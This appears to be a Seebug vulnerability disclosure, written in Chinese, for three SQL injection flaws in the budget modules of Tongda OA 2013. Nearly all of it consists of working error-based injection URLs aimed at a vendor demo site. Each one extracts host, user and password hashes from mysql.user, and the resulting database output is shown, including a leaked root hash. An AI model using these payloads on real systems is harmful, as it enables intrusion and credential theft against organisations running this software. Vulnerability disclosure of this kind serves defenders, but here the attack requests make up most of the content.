通达oa2013集团版注入3处

2015-04-09T00:00:00
ID SSV:96104
Type seebug
Reporter Root
Modified 2015-04-09T00:00:00

Description

简要描述:

通达

详细说明:

官网demo登录: http://www.day900.com/ cw登陆比较鸡肋

漏洞证明:

注入1+payload: http://www.day900.com/general/budget/budget_process/budget_project_depts.php?DEPT_ID=1&DEPT_ID_PRIV=0&DEPT_IDS=1) and%20(select%201%20from%20(select%20count(),concat((select%20concat(host,user,password)%20from%20mysql.user%20limit%200,1),floor(rand(0)2))x%20from%20information_schema.tables%20group%20by%20x)a)%23&YEAR=2015 返回: 请联系管理员 错误#1062: Duplicate entry 'localhostroot91AF99F23C3D4ED85140D100433725DFA52BECEE1' for key 'group_key' SQL语句: SELECT COUNT(BUDGET_RESULT_ID) FROM BUDGET_RESULT WHERE FORMATION_WAY='P' AND DEPT_ID IN (1) and (select 1 from (select count(),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)#) AND ALLOW = '1' AND BUDGET_YEAR ='2015' 文件:/general/budget/budget_process/budget_project_depts.php 注入2+payload: http://www.day900.com/general/budget/budget_process/budget_month_depts.php?DEPT_ID=1&DEPT_ID_PRIV=0&DEPT_IDS=1)and%20(select%201%20from%20(select%20count(),concat((select%20concat(host,user,password)%20from%20mysql.user%20limit%200,1),floor(rand(0)2))x%20from%20information_schema.tables%20group%20by%20x)a)%23&YEAR=2015 返回: 请联系管理员 错误#1062: Duplicate entry 'localhostroot91AF99F23C3D4ED85140D100433725DFA52BECEE1' for key 'group_key' SQL语句: SELECT COUNT(DISTINCT BUDGET_ID) FROM BUDGET_RESULT WHERE FORMATION_WAY='M' AND ALLOW = '1' AND DEPT_ID IN (1)and (select 1 from (select count(),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)#) AND BUDGET_YEAR ='2015' 文件:/general/budget/budget_process/budget_month_depts.php 注入3+payload: http://www.day900.com/general/budget/budget_process/budget_quater_depts.php?DEPT_ID=1&DEPT_ID_PRIV=0&DEPT_IDS=1)and%20(select%201%20from%20(select%20count(),concat((select%20concat(host,user,password)%20from%20mysql.user%20limit%200,1),floor(rand(0)2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 &YEAR=2015 返回: 请联系管理员 错误#1062: Duplicate entry 'localhostroot91AF99F23C3D4ED85140D100433725DFA52BECEE1' for key 'group_key' SQL语句: SELECT COUNT(DISTINCT BUDGET_ID) FROM BUDGET_RESULT WHERE FORMATION_WAY='M' AND ALLOW = '1' AND DEPT_ID IN (1)and (select 1 from (select count(),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#) AND BUDGET_YEAR ='2015' 文件:/general/budget/budget_process/budget_quarter_depts.php 注入3+payload: